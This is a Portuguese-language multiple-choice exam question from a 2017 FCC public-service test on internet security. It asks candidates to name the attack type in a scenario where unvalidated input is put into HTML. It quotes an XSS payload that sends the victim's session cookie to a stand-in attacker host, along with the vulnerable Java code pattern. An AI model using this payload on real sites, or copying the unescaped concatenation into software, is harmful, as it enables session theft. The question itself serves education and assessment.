Questão de Segurança da Informação — Segurança na Internet — FCC 2017
Segurança da InformaçãoSegurança na Internet
- Código
- fc039839
- Banca
- FCC
- Órgão
- TRT - 24ª REGIÃO (MS)
- Ano
- 2017
- Nível
- Superior
- Cargo
- Analista Judiciário - Tecnologia da Informação
Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +request.getParameter("credit_card") + " '>";Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.Este é um cenário de ataque do tipo
- ACross-Site Scripting.
- BBuffer Overflow.
- CAdvanced Persistent Threat.
- DScript-Fake Injection.
- ESession Persistent Hijacking.